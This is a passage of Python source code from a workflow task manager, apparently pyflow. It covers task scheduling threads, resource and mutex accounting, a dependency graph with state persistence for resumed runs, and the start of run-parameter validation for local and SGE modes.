        self.tdag = tdag
        # thread settings:
        self.setDaemon(True)
        self.setName("TaskManager-Thread")
        # lock is used for function (harvest), which is checked by
        # the WorkflowRunner under (literally) exceptional circumstances only
        self.lock = threading.RLock()
        # rm configuration:
        self.freeCores = self._cdata.param.nCores
        self.freeMemMb = self._cdata.param.memMb
        self.runningTasks = {}
        # This is used to track 'pyflow mutexes' -- for each key only a single
        # task can run at once. Key is set to True if mutex is occupied.
        self.taskMutexState = {}

    def run(self) :
        """
        TaskManager runs so long as there are outstanding jobs
        """
        try:
            cleanEnv()
            while not self._isTerm() :
                # update status of running jobs
                self.tdag.isFinishedEvent.clear()
                self.harvestTasks()
                # try to launch jobs:
                if self.stopped() : continue
                self._startTasks()
                # block up to 5s, or until a task signals completion:
                self.tdag.isFinishedEvent.wait(5)
        except:
            msg = getExceptionMsg()
            self._flowLog(msg,logState=LogState.ERROR)
            self._cdata.emailNotification(msg, self._flowLog)
            self._cdata.setTaskManagerException()

    def _getCommandTaskRunner(self, task) :
        """
        assist launch of a command-task
        """
        # shortcuts:
        payload = task.payload
        param = self._cdata.param

        if payload.cmd.cmd is None :
            # Note these should have been marked off by the TaskManager already:
            raise Exception("Attempting to launch checkpoint task: %s" % (task.fullLabel()))

        isForcedLocal = ((param.mode != "local") and (payload.isForceLocal))

        # mark task resources as occupied:
        if not isForcedLocal :
            if self.freeCores != "unlimited" :
                if (self.freeCores < payload.nCores) :
                    raise Exception("Not enough free cores to launch task")
                self.freeCores -= payload.nCores

            if self.freeMemMb != "unlimited" :
                if (self.freeMemMb < payload.memMb) :
                    raise Exception("Not enough free memory to launch task")
                self.freeMemMb -= payload.memMb

        if payload.mutex is not None :
            self.taskMutexState[payload.mutex] = True

        TaskRunner = None
        if param.mode == "local" or payload.isForceLocal or payload.isCmdMakePath :
            TaskRunner = LocalTaskRunner
        elif param.mode == "sge" :
            TaskRunner = SGETaskRunner
        else :
            raise Exception("Can't support mode: '%s'" % (param.mode))

        #
        # TODO: find less hacky way to handle make tasks:
        #
        taskRetry = payload.retry

        if payload.isCmdMakePath :
            taskRetry = copy.deepcopy(payload.retry)
            taskRetry.window = 0

            if param.mode == "local" or payload.isForceLocal :
                launchCmdList = ["make", "-j", str(payload.nCores)]
            elif param.mode == "sge" :
                launchCmdList = siteConfig.getSgeMakePrefix(payload.nCores, payload.memMb, param.schedulerArgList)
            else :
                raise Exception("Can't support mode: '%s'" % (param.mode))

            launchCmdList.extend(["-C", payload.cmd.cmd])
            payload.launchCmd = Command(launchCmdList, payload.cmd.cwd, payload.cmd.env)

        #
        # each commandTaskRunner requires a unique tmp dir to write
        # wrapper signals to. TaskRunner will create this directory -- it does not bother to destroy it right now:
        #

        # split the task id into two parts to keep from adding too many files to one directory:
        # NOTE(review): '/' yields a float under Python 3; '%03i' truncates it,
        # but '//' would be the cleaner integer division here -- confirm intent.
        tmpDirId1 = "%03i" % ((int(task.id) / 1000))
        tmpDirId2 = "%03i" % ((int(task.id) % 1000))
        taskRunnerTmpDir = os.path.join(self._cdata.wrapperLogDir, tmpDirId1, tmpDirId2)

        return TaskRunner(task.runStatus, self._cdata.getRunid(),
                          task.fullLabel(), payload.launchCmd,
                          payload.nCores, payload.memMb,
                          taskRetry, param.isDryRun,
                          self._cdata.taskStdoutFile,
                          self._cdata.taskStderrFile,
                          taskRunnerTmpDir,
                          param.schedulerArgList,
                          self._cdata.flowLog,
                          task.setRunstate)

    def _getWorkflowTaskRunner(self, task) :
        """
        assist launch of a workflow-task
        """
        return WorkflowTaskRunner(task.runStatus, task.fullLabel(),
                                  task.payload.workflow,
                                  self._cdata.flowLog,
                                  task.setRunstate)

    def _launchTask(self, task) :
        """
        launch a specific task
        """
        if task.payload.type() == "command" :
            trun = self._getCommandTaskRunner(task)
        elif task.payload.type() == "workflow" :
            trun = self._getWorkflowTaskRunner(task)
        else :
            assert 0

        self._infoLog("Launching %s: '%s' from %s" % (task.payload.desc(), task.fullLabel(), namespaceLabel(task.namespace)))
        trun.start()
        self.runningTasks[task] = trun

    @lockMethod
    def _startTasks(self) :
        """
        Determine what tasks, if any, can be started

        Note that the lock is here to protect self.runningTasks
        """
        # Trace through DAG, completing any empty-command checkpoints
        # found with all dependencies completed, then report everything
        # else with completed dependencies that's ready to run
        (ready, completed) = self.tdag.getReadyTasks()
        for node in completed:
            if self.stopped() : return
            self._infoLog("Completed %s: '%s' launched from %s" % (node.payload.desc(), node.fullLabel(), namespaceLabel(node.namespace)))

        # launch all workflows first, then launch command tasks as resources allow:
        ready_workflows = [r for r in ready if r.payload.type() == "workflow"]
        for task in ready_workflows :
            if self.stopped() : return
            self._launchTask(task)

        # Task submission could be shutdown, eg. in response to a task error, so check for this state and stop if so
        # TODO can this be moved above workflow launch?
        if (not self._cdata.isTaskSubmissionActive()) : return

        isNonLocal = (self._cdata.param.mode != "local")

        # start command task launch:
        ready_commands = [r for r in ready if r.payload.type() == "command"]
        ready_commands.sort(key=lambda t: (t.payload.priority, t.payload.nCores), reverse=True)
        for task in ready_commands :
            if self.stopped() : return

            # In a non-local run mode, "isForceLocal" tasks are not subject to
            # global core and memory restrictions:
            isForcedLocal = (isNonLocal and task.payload.isForceLocal)
            if not isForcedLocal :
                if ((self.freeCores != "unlimited") and (task.payload.nCores > self.freeCores)) : continue
                if ((self.freeMemMb != "unlimited") and (task.payload.memMb > self.freeMemMb)) : continue

            # all command tasks must obey separate mutex restrictions:
            if ((task.payload.mutex is not None) and
                (task.payload.mutex in self.taskMutexState) and
                (self.taskMutexState[task.payload.mutex])) : continue

            self._launchTask(task)

    def _removeTaskFromRunningSet(self, task) :
        """
        Given a running task which is already shown to be finished running,
        remove it from the running set, and recover allocated resources.
        """
        assert(task in self.runningTasks)

        # shortcut:
        param = self._cdata.param

        # recover core and memory allocations:
        if task.payload.type() == "command" :
            isForcedLocal = ((param.mode != "local") and (task.payload.isForceLocal))
            if not isForcedLocal :
                if self.freeCores != "unlimited" :
                    self.freeCores += task.payload.nCores
                if self.freeMemMb != "unlimited" :
                    self.freeMemMb += task.payload.memMb

            if task.payload.mutex is not None :
                self.taskMutexState[task.payload.mutex] = False

        del self.runningTasks[task]

    @lockMethod
    def harvestTasks(self) :
        """
        Check the set of running tasks to see if they've completed and update
        Node status accordingly:
        """
        notrunning = set()
        for task in list(self.runningTasks.keys()) :
            if self.stopped() : break
            trun = self.runningTasks[task]
            if not task.runStatus.isComplete.isSet() :
                if trun.is_alive() : continue
                # if not complete and thread is dead then we don't know what happened, very bad!:
                task.errorstate = 1
                task.errorMessage = "Thread: '%s', has stopped without a traceable cause" % (trun.getName())
            else :
                task.errorstate = task.runStatus.errorCode
                task.errorMessage = task.runStatus.errorMessage

            if task.errorstate == 0 :
                task.setRunstate("complete")
            else:
                task.setRunstate("error")

            notrunning.add(task)

            if not task.isError() :
                self._infoLog("Completed %s: '%s' launched from %s" % (task.payload.desc(), task.fullLabel(), namespaceLabel(task.namespace)))
            else:
                msg = task.getTaskErrorMsg()

                if self._cdata.isTaskSubmissionActive() :
                    # if this is the first error in the workflow, then
                    # we elaborate a bit on the workflow's response to
                    # the error. We also send any email-notifications
                    # for the first error only:
                    msg.extend(["Shutting down task submission. Waiting for remaining tasks to complete."])

                self._errorLog(msg)
                if self._cdata.isTaskSubmissionActive() :
                    self._cdata.emailNotification(msg, self._flowLog)

                # Be sure to send notifications *before* setting error
                # bits, because the WorkflowRunner may decide to
                # immediately shutdown all tasks and pyflow threads on
                # the first error:
                self._cdata.setTaskError(task)

        # recover task resources:
        for task in notrunning :
            self._removeTaskFromRunningSet(task)

    @lockMethod
    def cancelTaskTree(self, task) :
        """
        Cancel a task and all of its children, without labeling the canceled tasks as errors

        A canceled task will not be stopped if it is already running (this is planned for the future),
        but will be unqueued if it is waiting, and put into the waiting/ignored state unless it has
        already completed.
        """
        # Recursively cancel child tasks:
        for child in task.children :
            self.cancelTaskTree(child)

        # In theory we would like to cancel running tasks, but this will take considerable extra development,
        # for now runningTasks will need to be ignored:
        if task in self.runningTasks :
            return
        #        # some of the logic required for running task cancelation:
        #        taskRunner = self.runningTasks[task]
        #        taskRunner.stop()
        #        self._removeTaskFromRunningSet(task)

        self._infoLog("Canceling %s '%s' from %s" % (task.payload.desc(), task.fullLabel(), namespaceLabel(task.namespace)))

        self.tdag.cancelTask(task)

    @lockMethod
    def stop(self) :
        # stop this manager thread and every runner it launched:
        StoppableThread.stop(self)
        for trun in list(self.runningTasks.values()) :
            trun.stop()

    @lockMethod
    def _areTasksDead(self) :
        for trun in list(self.runningTasks.values()) :
            if trun.is_alive(): return False
        return True

    def _isTerm(self) :
        # check for explicit thread stop request (presumably from the workflowManager):
        # if this happens we exit the polling loop
        #
        if self.stopped() :
            while True :
                if self._areTasksDead() :
                    return True
                time.sleep(1)

        # check for "regular" termination conditions:
        if (not self._cdata.isTaskSubmissionActive()) :
            return (len(self.runningTasks) == 0)
        else :
            if self.tdag.isRunComplete() :
                if (len(self.runningTasks) != 0) :
                    raise Exception("Inconsistent TaskManager state: workflow appears complete but there are still running tasks")
                return True
            elif self.tdag.isRunExhausted() :
                return True
            else :
                return False

    def _flowLog(self, msg, logState) :
        linePrefixOut = "[TaskManager]"
        # if linePrefix is not None : linePrefixOut+=" "+linePrefix
        self._cdata.flowLog(msg, linePrefix=linePrefixOut, logState=logState)

    def _infoLog(self, msg) :
        self._flowLog(msg, logState=LogState.INFO)

    def _errorLog(self, msg) :
        self._flowLog(msg, logState=LogState.ERROR)



# payloads are used to manage the different
# possible actions attributed to task nodes:
#
class CmdPayload(object) :
    """
    Task-node payload for a command task (an external command to execute).
    """

    def __init__(self, fullLabel, cmd, nCores, memMb, priority,
                 isForceLocal, isCmdMakePath=False, isTaskStable=True,
                 mutex=None, retry=None) :
        self.cmd = cmd
        self.nCores = nCores
        self.memMb = memMb
        self.priority = priority
        self.isForceLocal = isForceLocal
        self.isCmdMakePath = isCmdMakePath
        self.isTaskStable = isTaskStable
        self.isTaskEphemeral = False
        self.mutex = mutex
        self.retry = retry

        # launch command includes make/qmake wrapper for Make path commands:
        self.launchCmd = cmd

        if (cmd.cmd is None) and ((nCores != 0) or (memMb != 0)) :
            raise Exception("Null tasks should not have resource requirements. task: '%s'" % (fullLabel))

    def type(self) :
        return "command"

    def desc(self) :
        return "command task"


class WorkflowPayload(object) :
    """
    Task-node payload for a sub-workflow task.
    """

    def __init__(self, workflow, isTaskEphemeral=False) :
        self.workflow = workflow
        self.isTaskStable = True
        self.isTaskEphemeral = isTaskEphemeral

    def type(self) :
        return "workflow"

    def name(self) :
        if self.workflow is None :
            return "None"
        else :
            return self.workflow._whoami()

    def desc(self) :
        return "sub-workflow task"


class TaskNode(object) :
    """
    Represents an individual task in the task graph
    """

    def __init__(self, lock, init_id, namespace, label, payload, isContinued, isFinishedEvent, isWriteTaskStatus) :
        self.lock = lock
        self.id = init_id
        self.namespace = namespace
        self.label = label
        self.payload = payload
        self.isContinued = isContinued

        assert(isWriteTaskStatus is not None)
        self.isWriteTaskStatus = isWriteTaskStatus

        # if true, do not execute this task or honor it as a dependency for child tasks
        self.isIgnoreThis = False

        # if true, set the ignore state for all children of this task to true
        self.isIgnoreChildren = False

        # if true, this task and its dependents will be automatically marked as completed (until
        # a startFromTasks node is found)
        self.isAutoCompleted = False

        # task is reset to waiting runstate in a continued run
        self.isReset = False

        self.parents = set()
        self.children = set()
        self.runstateUpdateTimeStamp = time.time()
        if self.isContinued:
            self.runstate = "complete"
        else:
            self.runstate = "waiting"
        self.errorstate = 0

        # errorMessage is used by sub-workflow tasks, but not by command tasks:
        self.errorMessage = ""

        # This is a link to the live status object updated by TaskRunner:
        self.runStatus = RunningTaskStatus(isFinishedEvent)

    def __str__(self) :
        msg = "TASK id: %s state: %s error: %i" % (self.fullLabel(), self.runstate, self.errorstate)
        return msg

    def fullLabel(self) :
        return namespaceJoin(self.namespace, self.label)

    @lockMethod
    def isDone(self) :
        "task has gone as far as it can"
        return ((self.runstate == "error") or
(self.runstate == "complete")) @lockMethod def isError(self) : "true if an error occurred in this node" return ((self.errorstate != 0) or (self.runstate == "error")) @lockMethod def isComplete(self) : "task completed without error" return ((self.errorstate == 0) and (self.runstate == "complete")) @lockMethod def isReady(self) : "task is ready to be run" retval = ((self.runstate == "waiting") and (self.errorstate == 0) and (not self.isIgnoreThis)) if retval : for p in self.parents : if p.isIgnoreThis : continue if not p.isComplete() : retval = False break return retval def _isDeadWalker(self, searched) : "recursive helper function for isDead()" # the fact that you're still searching means that it must have returned False last time: if self in searched : return False searched.add(self) if self.isError() : return True if self.isComplete() : return False for p in self.parents : if p._isDeadWalker(searched) : return True return False @lockMethod def isDead(self) : """ If true, there's no longer a point to waiting for this task, because it either has an error or there is an error in an upstream dependency """ # searched is used to restrict the complexity of this # operation on large graphs: searched = set() return self._isDeadWalker(searched) @lockMethod def setRunstate(self, runstate, updateTimeStamp=None) : """ updateTimeStamp is only supplied in the case where the state transition time is interestingly different than the function call time. This can happen with the state update comes from a polling function with a long poll interval. 
""" if runstate not in TaskNodeConstants.validRunstates : raise Exception("Can't set TaskNode runstate to %s" % (runstate)) if updateTimeStamp is None : self.runstateUpdateTimeStamp = time.time() else : self.runstateUpdateTimeStamp = updateTimeStamp self.runstate = runstate self.isWriteTaskStatus.set() @lockMethod def getTaskErrorMsg(self) : """ generate consistent task error message from task state """ if not self.isError() : return [] msg = "Failed to complete %s: '%s' launched from %s" % (self.payload.desc(), self.fullLabel(), namespaceLabel(self.namespace)) if self.payload.type() == "command" : msg += ", error code: %s, command: '%s'" % (str(self.errorstate), str(self.payload.launchCmd)) elif self.payload.type() == "workflow" : msg += ", failed sub-workflow classname: '%s'" % (self.payload.name()) else : assert 0 msg = lister(msg) if self.errorMessage != "" : msg2 = ["Error Message:"] msg2.extend(lister(self.errorMessage)) linePrefix = "[%s] " % (self.fullLabel()) for i in range(len(msg2)) : msg2[i] = linePrefix + msg2[i] msg.extend(msg2) return msg class TaskDAG(object) : """ Holds all tasks and their dependencies. Also responsible for task state persistence/continue across interrupted runs. Object is accessed by both the workflow and taskrunner threads, so it needs to be thread-safe. """ def __init__(self, isContinue, isForceContinue, isDryRun, taskInfoFile, taskStateFile, workflowClassName, startFromTasks, ignoreTasksAfter, resetTasks, flowLog) : """ No other object/thread gets to access the taskStateFile, so file locks are not required (but thread locks are) """ # If isConintue is true, this is a run which is continuing from a previous interrupted state. 
    @lockMethod
    def isTaskPresent(self, namespace, label) :
        "True if a task with this (namespace, label) is already in the DAG"
        return ((namespace, label) in self.labelMap)

    @lockMethod
    def getTask(self, namespace, label) :
        "return the task node for (namespace, label), or None if absent"
        if (namespace, label) in self.labelMap :
            return self.labelMap[(namespace, label)]
        return None

    @lockMethod
    def getHeadNodes(self) :
        "all tasks with no parents"
        return list(self.headNodes)

    @lockMethod
    def getTailNodes(self) :
        "all tasks with no (runnable) children"
        return list(self.tailNodes)

    @lockMethod
    def getAllNodes(self, namespace="") :
        "get all nodes in this namespace"
        retval = []
        for (taskNamespace, taskLabel) in self.addOrder :
            if namespace != taskNamespace : continue
            node = self.labelMap[(taskNamespace, taskLabel)]
            # ignored nodes are excluded from enumeration:
            if node.isIgnoreThis : continue
            retval.append(node)
        return retval

    @lockMethod
    def cancelTask(self, task) :
        """
        Cancel a task: mark it ignored and restore the tail-node set invariant.
        """
        # Nothing to do if task is already done
        if task.isDone() : return

        # Nothing to do if task is already ignored
        if task.isIgnoreThis : return

        # Can't cancel a task with uncanceled children:
        for child in task.children :
            assert(child.isIgnoreThis)

        task.runstate = "waiting"
        task.isIgnoreThis = True

        if task in self.tailNodes :
            self.tailNodes.remove(task)

        # a parent becomes a tail node when all of its children are ignored:
        for parent in task.parents :
            isTailNode = True
            for child in parent.children :
                if not child.isIgnoreThis :
                    isTailNode = False
                    break
            if isTailNode :
                self.tailNodes.add(parent)

    def _isRunExhaustedNode(self, node, searched) :
        # the fact that you're still searching means that it must have returned true last time:
        if node in searched : return True
        searched.add(node)

        if not node.isIgnoreThis :
            if not node.isDone() :
                return False
            if node.isComplete() :
                for c in node.children :
                    if not self._isRunExhaustedNode(c, searched) :
                        return False
        return True

    @lockMethod
    def isRunExhausted(self) :
        """
        Returns true if the run is as complete as possible due to errors
        """
        # searched is used to restrict the complexity of this
        # operation on large graphs:
        searched = set()
        for node in self.getHeadNodes() :
            if not self._isRunExhaustedNode(node, searched) :
                return False
        return True

    @lockMethod
    def isRunComplete(self) :
        "returns true if run is complete and error free"
        for node in list(self.labelMap.values()):
            if node.isIgnoreThis : continue
            if not node.isComplete() :
                return False
        return True

    def _getReadyTasksFromNode(self, node, ready, searched) :
        "helper function for getReadyTasks"
        if node.isIgnoreThis : return
        if node in searched : return
        searched.add(node)

        if node.isReady() :
            ready.add(node)
        else:
            # recurse into parents only while the subgraph is incomplete:
            if not node.isComplete() :
                for c in node.parents :
                    self._getReadyTasksFromNode(c, ready, searched)

    @lockMethod
    def getReadyTasks(self) :
        """
        Go through DAG from the tail nodes and find all tasks which
        have all prerequisites completed:
        """
        completed = self.markCheckPointsComplete()
        ready = set()
        # searched is used to restrict the complexity of this
        # operation on large graphs:
        searched = set()
        for node in self.getTailNodes() :
            self._getReadyTasksFromNode(node, ready, searched)
        return (list(ready), list(completed))
self.getTailNodes() : self._getReadyTasksFromNode(node, ready, searched) return (list(ready), list(completed)) def _markCheckPointsCompleteFromNode(self, node, completed, searched) : "helper function for markCheckPointsComplete" if node.isIgnoreThis : return if node in searched : return searched.add(node) if node.isComplete() : return for c in node.parents : self._markCheckPointsCompleteFromNode(c, completed, searched) def isCheckpointTask(task) : return (task.payload.type() == "command") and (task.payload.cmd.cmd is None) if node.isReady() and isCheckpointTask(node) : node.setRunstate("complete") completed.add(node) @lockMethod def markCheckPointsComplete(self) : """ Traverse from tail nodes up, marking any checkpoint tasks that are ready as complete, return set of newly completed tasks: """ completed = set() # 'searched' set is used to restrict the complexity of this # operation on large graphs: searched = set() for node in self.getTailNodes() : self._markCheckPointsCompleteFromNode(node, completed, searched) return completed @lockMethod def addTask(self, namespace, label, payload, dependencies, isContinued=False) : """ Add new task to the task DAG @param isContinued If true, the task is being read from state history while resuming an interrupted run """ # We should not expect to see isContinued task input unless this is a continued workflow: assert(not (isContinued and (not self.isContinue))) # internal data structures use the task namespace and label separately, but for logging we # create one string: fullLabel = namespaceJoin(namespace, label) # first check to see if task exists in DAG already, this is not allowed unless # we are continuing a previous run, in which case it's allowed once: if not isContinued and self.isTaskPresent(namespace, label): if self.isContinue and self.labelMap[(namespace, label)].isContinued: # confirm that task is a match, flip off the isContinued flag and return: task = self.labelMap[(namespace, label)] parentLabels = set([p.label 
for p in task.parents]) excPrefix = "Task: '%s' does not match previous definition defined in '%s'." % (fullLabel, self.taskInfoFile) if task.payload.type() != payload.type() : msg = excPrefix + " New/old payload type: '%s'/'%s'" % (payload.type(), task.payload.type()) raise Exception(msg) if payload.isTaskStable : if (payload.type() == "command") and (str(task.payload.cmd) != str(payload.cmd)) : msg = excPrefix + " New/old command: '%s'/'%s'" % (str(payload.cmd), str(task.payload.cmd)) if self.isForceContinue : self.flowLog(msg,logState=LogState.WARNING) else : raise Exception(msg) if (parentLabels != set(dependencies)) : msg = excPrefix + " New/old dependencies: '%s'/'%s'" % (",".join(dependencies), ",".join(parentLabels)) if self.isForceContinue : self.flowLog(msg,logState=LogState.WARNING) else : raise Exception(msg) if payload.type() == "command" : task.payload.cmd = payload.cmd task.payload.isCmdMakePath = payload.isCmdMakePath # Deal with resuming ephemeral tasks if payload.isTaskEphemeral : def doesTaskHaveFinishedChildren(task) : # Check for completed children (completed children, but not incomplete children, must have been # entered by this point in a continued run: for child in task.children : if child.isComplete() : return True return False if not doesTaskHaveFinishedChildren(task) : if payload.type() == "workflow" : # workflow logic is not recorded in the state file, so on continuation it needs to be added back in: task.payload.workflow = payload.workflow task.setRunstate("waiting") task.payload.isTaskEphemeral = True task.isContinued = False return else: raise Exception("Task: '%s' is already in TaskDAG" % (fullLabel)) task = TaskNode(self.lock, self.taskId, namespace, label, payload, isContinued, self.isFinishedEvent, self.isWriteTaskStatus) self.taskId += 1 self.addOrder.append((namespace, label)) self.labelMap[(namespace, label)] = task for d in dependencies : parent = self.getTask(namespace, d) if parent is task : raise Exception("Task: '%s' 
cannot specify its own task label as a dependency" % (fullLabel)) if parent is None : raise Exception("Dependency: '%s' for task: '%s' does not exist in TaskDAG" % (namespaceJoin(namespace, d), fullLabel)) task.parents.add(parent) parent.children.add(task) if isContinued : isReset=False if label in self.resetTasks : isReset=True else : for p in task.parents : if p.isReset : isReset = True break if isReset : task.setRunstate("waiting") task.isReset=True if not isContinued: self.isWriteTaskInfo.set() self.isWriteTaskStatus.set() # determine if this is an ignoreTasksAfter node if label in self.ignoreTasksAfter : task.isIgnoreChildren = True # determine if this is an ignoreTasksAfter descendant for p in task.parents : if p.isIgnoreChildren : task.isIgnoreThis = True task.isIgnoreChildren = True break # update headNodes if len(task.parents) == 0 : self.headNodes.add(task) # update isAutoCompleted: if (self.startFromTasks and (label not in self.startFromTasks)) : task.isAutoCompleted = True for p in task.parents : if not p.isAutoCompleted : task.isAutoCompleted = False break # in case of no-parents, also check sub-workflow node if task.isAutoCompleted and (len(task.parents) == 0) and (namespace != ""): wval=namespace.rsplit(namespaceSep,1) if len(wval) == 2 : (workflowNamespace,workflowLabel)=wval else : workflowNamespace="" workflowLabel=wval[0] workflowParent = self.labelMap[(workflowNamespace, workflowLabel)] if not workflowParent.isAutoCompleted : task.isAutoCompleted = False if task.isAutoCompleted : task.setRunstate("complete") # update tailNodes: if not task.isIgnoreThis : self.tailNodes.add(task) for p in task.parents : if p in self.tailNodes : self.tailNodes.remove(p) # check dependency runState consistency: if task.isDone() : for p in task.parents : if p.isIgnoreThis : continue if p.isComplete() : continue raise Exception("Task: '%s' has invalid continuation state. 
Task dependencies are incomplete") @lockMethod def writeTaskStatus(self) : """ Update the runstate and errorstate for all tasks. This is intended to be atomic, but can only be made so on unix. """ # don't write task status during dry runs: if self.isDryRun : return tmpFile = self.taskStateFile + ".update.incomplete" tmpFp = open(tmpFile, "w") tmpFp.write(taskStateHeader()) for (namespace, label) in self.addOrder : task = self.labelMap[(namespace, label)] runstateUpdateTimeStr = timeStampToTimeStr(task.runstateUpdateTimeStamp) tmpFp.write("%s\t%s\t%s\t%i\t%s\n" % (label, namespace, task.runstate, task.errorstate, runstateUpdateTimeStr)) tmpFp.close() forceRename(tmpFile, self.taskStateFile) @lockMethod def getTaskStatus(self) : """ Enumerate status of command tasks (but look at sub-workflows to determine if specification is complete) """ val = Bunch(waiting=0, queued=0, running=0, complete=0, error=0, isAllSpecComplete=True, longestQueueSec=0, longestRunSec=0, longestQueueName="", longestRunName="") currentSec = time.time() for (namespace, label) in self.addOrder : node = self.labelMap[(namespace, label)] # special check just for workflow tasks: if node.payload.type() == "workflow" : if not node.runStatus.isSpecificationComplete.isSet() : val.isAllSpecComplete = False # the rest of this enumeration is for command tasks only: continue taskTime = int(currentSec - node.runstateUpdateTimeStamp) if node.runstate == "waiting" : val.waiting += 1 elif node.runstate == "queued" : val.queued += 1 if val.longestQueueSec < taskTime : val.longestQueueSec = taskTime val.longestQueueName = node.fullLabel() elif node.runstate == "running" : val.running += 1 if val.longestRunSec < taskTime : val.longestRunSec = taskTime val.longestRunName = node.fullLabel() elif node.runstate == "complete" : val.complete += 1 elif node.runstate == "error" : val.error += 1 return val @lockMethod def writeTaskInfo(self) : """ appends a description of all new tasks to the taskInfo file """ def 
    def _createContinuedStateFile(self, taskStateFile) :
        """
        Update task state file for a 'continued' run, meaning a run which is
        being resumed after interrupt.

        In this scenario, the existing task state file is read in but only
        tasks which are complete retain status, and any other state (running,
        queued, etc.) is lost, reflecting the atomic nature of these tasks --
        having not completed they must be completely restarted. The filtered
        task output is written to a new task file and swapped in to replace
        the old task state file.

        The function returns the set of full names for complete tasks
        """
        if not os.path.isfile(taskStateFile) : return set()

        tmpFile = taskStateFile + ".update.incomplete"
        tmpfp = open(tmpFile, "w")
        tmpfp.write(taskStateHeader())
        complete = set()
        for words in taskStateParser(taskStateFile) :
            (runState, errorCode) = words[2:4]
            # drop any task which did not finish cleanly -- it must be restarted:
            if (runState != "complete") or (int(errorCode) != 0) : continue
            tmpfp.write("\t".join(words) + "\n")
            (label, namespace) = words[0:2]
            complete.add(namespaceJoin(namespace, label))

        tmpfp.close()
        forceRename(tmpFile, taskStateFile)
        return complete

    def _createContinuedInfoFile(self, taskInfoFile, complete) :
        """
        Initialize TaskDAG to include placeholders of all tasks which have
        already been completed. Also update task info file to only retain
        completed tasks.

        Placeholder tasks are used to check that the underlying task
        definitions have not unexpectedly changed over the interrupt/resume
        cycle.

        Update the task info file when a run is attempting to continue from
        where it left off after interruption.

        @param complete: Fullnames of all completed tasks
        """
        if not os.path.isfile(taskInfoFile) : return

        tmpFile = taskInfoFile + ".update.incomplete"
        tmpfp = open(tmpFile, "w")
        tmpfp.write(taskInfoHeader())
        for words in taskInfoParser(taskInfoFile) :
            (label, namespace, ptype, nCores, memMb, priority, isForceLocal, depStr, cwdStr, command) = words
            fullLabel = namespaceJoin(namespace, label)
            if fullLabel not in complete : continue
            tmpfp.write("\t".join(words) + "\n")
            self.lastTaskIdWritten += 1

            if ptype == "command" :
                if command == "" : command = None
                payload = CmdPayload(fullLabel, Command(command, cwdStr), int(nCores), int(memMb), int(priority), argToBool(isForceLocal))
            elif ptype == "workflow" :
                payload = WorkflowPayload(None)
            else : assert 0

            # add a placeholder task so definition changes can be detected on resume:
            self.addTask(namespace, label, payload, getTaskInfoDepSet(depStr), isContinued=True)

        tmpfp.close()
        forceRename(tmpFile, taskInfoFile)

    @lockMethod
    def setupContinuedWorkflow(self) :
        """
        Take care of all continuation specific setup activities. Read previous
        task state files if they exist and initialize taskDAG to reflect all
        tasks which have already been completed. Update task state files to
        reflect completed tasks only.
        """
        # Ensure that state file notifiers have been initialized as a precondition to this step, because
        # we create new tasks while reading the info file, and the state file notifiers are copied from
        # this object into the individual tasks.
        #
        assert(self.isWriteTaskInfo is not None)
        assert(self.isWriteTaskStatus is not None)

        complete = self._createContinuedStateFile(self.taskStateFile)
        self._createContinuedInfoFile(self.taskInfoFile, complete)



# workflowRunner:
#

class DataDirException(Exception) :
    """
    Special exception used for the case where pyflow data dir is already in use
    """
    def __init__(self, msg) :
        Exception.__init__(self)
        self.msg = msg


class WorkflowRunnerThreadSharedData(object) :
    """
    All data used by the WorkflowRunner which will be constant over the
    lifetime of a TaskManager instance. All of the information in this class
    will be accessed by both threads without locking.
    """
All of the information in this class will be accessed by both threads without locking. """ def __init__(self) : self.lock = threading.RLock() self.pid = os.getpid() self.runcount = 0 self.cwd = os.path.abspath(os.getcwd()) self.markFile = None # we potentially have to log before the logfile is setup (eg # an exception is thrown reading run parameters), so provide # an explicit notification that there's no log file: self.flowLogFp = None self.warningLogFp = None self.errorLogFp = None self.resetRun() # two elements required to implement a nohup-like behavior: self.isHangUp = threading.Event() self._isStderrAlive = True @staticmethod def _validateFixParam(param): """ validate and refine raw run() parameters for use by workflow """ param.mailTo = setzer(param.mailTo) param.schedulerArgList = lister(param.schedulerArgList) if param.successMsg is not None : if not isString(param.successMsg) : raise Exception("successMsg argument to WorkflowRunner.run() is not a string") # create combined task retry settings manager: param.retry=RetryParam(param.mode, param.retryMax, param.retryWait, param.retryWindow, param.retryMode) # setup resource parameters if param.nCores is None : param.nCores = RunMode.data[param.mode].defaultCores # ignore total available memory settings in non-local modes: if param.mode != "local" : param.memMb = "unlimited" if param.mode == "sge" : if siteConfig.maxSGEJobs != "unlimited" : if ((param.nCores == "unlimited") or (int(param.nCores) > int(siteConfig.maxSGEJobs))) : param.nCores = int(siteConfig.maxSGEJobs) if param.nCores != "unlimited" : param.nCores = int(param.nCores) if param.nCores < 1 : raise Exception("Invalid run mode nCores argument: %s. 
Value must be 'unlimited' or an integer no less than 1" % (param.nCores)) if param.memMb is None : if param.nCores == "unlimited" : param.memMb = "unlimited" mpc = RunMode.data[param.mode].defaultMemMbPerCore if mpc == "unlimited" : param.memMb = "unlimited" else : param.memMb = mpc * param.nCores elif param.memMb != "unlimited" : param.memMb = int(param.memMb) if param.memMb < 1 : raise Exception("Invalid run mode memMb argument: %s. Value must be 'unlimited' or an integer no less than 1" % (param.memMb)) # verify/normalize input settings: if param.mode not in list(RunMode.data.keys()) : raise Exception("Invalid mode argument '%s'. Accepted modes are {%s}." \ % (param.mode, ",".join(list(RunMode.data.keys())))) if param.mode == "sge" : # TODO not-portable to windows (but is this a moot point -- all of sge mode is non-portable, no?): def checkSgeProg(prog) : proc = subprocess.Popen(("which", prog), stdout=open(os.devnull, "w"), shell=False) retval = proc.wait() if retval != 0 : raise Exception("Run mode is sge, but no %s in path" % (prog)) checkSgeProg("qsub") checkSgeProg("qstat") stateDir = os.path.join(param.dataDir, "state") if param.isContinue == "Auto" : param.isContinue = os.path.exists(stateDir) if param.isContinue : if not os.path.exists(stateDir) : raise Exception("Cannot continue run without providing a pyflow dataDir containing previous state.: '%s'" % (stateDir)) for email in param.mailTo : if not verifyEmailAddy(email): raise Exception("Invalid email address: '%s'" % (email)) def _setCustomLogs(self) : if (self.warningLogFp is None) and (self.param.warningLogFile is not None) : self.warningLogFp = open(self.param.warningLogFile,"w") if (self.errorLogFp is None) and (self.param.errorLogFile is not None) : self.errorLogFp = open(self.param.errorLogFile,"w") def setupNewRun(self, param) : self.param = param # setup log file-handle first, then run the rest of parameter validation: # (hold this file open so that we can still log if pyflow runs out of 
